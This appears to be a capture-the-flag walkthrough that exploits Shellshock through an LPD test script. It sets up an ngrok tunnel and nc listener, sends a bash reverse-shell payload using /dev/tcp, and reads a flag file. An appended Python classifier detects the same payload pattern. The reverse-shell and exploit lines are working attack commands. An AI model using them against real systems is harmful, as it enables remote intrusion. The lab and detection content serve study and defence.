Preparation
We'll try to get a reverse shell, so we need to:
1. Open a port so that the target can reach you
ngrok tcp 9002
2. Listen on this port
nc -lvnp 9002
Attack
Searching for Shellshock, you can find this
1. Crafting the payload
() { :; }; echo ; /bin/bash -c 'bash -i >& /dev/tcp/ngrokHost/ngrokPort 0>&1'
2. Send the payload using this tool
python3 lpdtest.py --port targetPort targetHost in '() { :; }; echo ; /bin/bash -c "bash -i >& /dev/tcp/ngrokHost/ngrokPort 0>&1"'
3. You get a reverse shell, now read the flag
cat /opt/flag.txt
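Detection side of the payload above, as an added example that is not part of the original write-up: a small Python classifier that flags the function-definition prefix, commands appended after it, and the /dev/tcp redirection in externally supplied field values. The function names, finding labels and sample values are assumptions constructed for illustration, and the URL-decoding step goes beyond the raw form shown on this page.

```python
import re
from urllib.parse import unquote_plus

# Vulnerable bash treats a value starting with "() {" as a function definition.
# Whitespace is matched loosely on purpose so near-variants are flagged too.
FUNC_DEF = re.compile(r"\(\s*\)\s*\{")
# Anything after the first closing brace is a command appended to the definition.
# Heuristic: nested braces in a legitimate function body can also match.
TRAILING = re.compile(r"\(\s*\)\s*\{.*?\}\s*;?\s*\S", re.S)
# bash /dev/tcp (or /dev/udp) redirection, as used for the callback above.
DEV_NET = re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/[^/\s]+")

def normalise(value, max_rounds=3):
    """Strip up to max_rounds layers of URL encoding so encoded copies match."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return the list of findings for one externally supplied field value."""
    text = normalise(value)
    findings = []
    if FUNC_DEF.search(text):
        findings.append("function-definition-prefix")
        if TRAILING.search(text):
            findings.append("trailing-command")
    if DEV_NET.search(text):
        findings.append("dev-net-redirect")
    return findings

# Constructed sample values; ngrokHost/ngrokPort are the page's own placeholders.
SAMPLES = [
    "() { :; }; echo ; /bin/bash -c 'bash -i >& /dev/tcp/ngrokHost/ngrokPort 0>&1'",
    "%28%29%20%7B%20%3A%3B%20%7D%3B%20echo",   # URL-encoded "() { :; }; echo"
    "%2528%2529%2520%257B",                     # double-encoded "() {"
    "() { echo hi; }",                          # exported function, nothing appended
    "Mozilla/5.0 (X11; Linux x86_64)",          # benign value
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample) or ["clean"], "<-", sample)
```

A value that only carries the prefix (an exported function with nothing appended) is reported separately from one with a trailing command, so the two can be triaged at different severities.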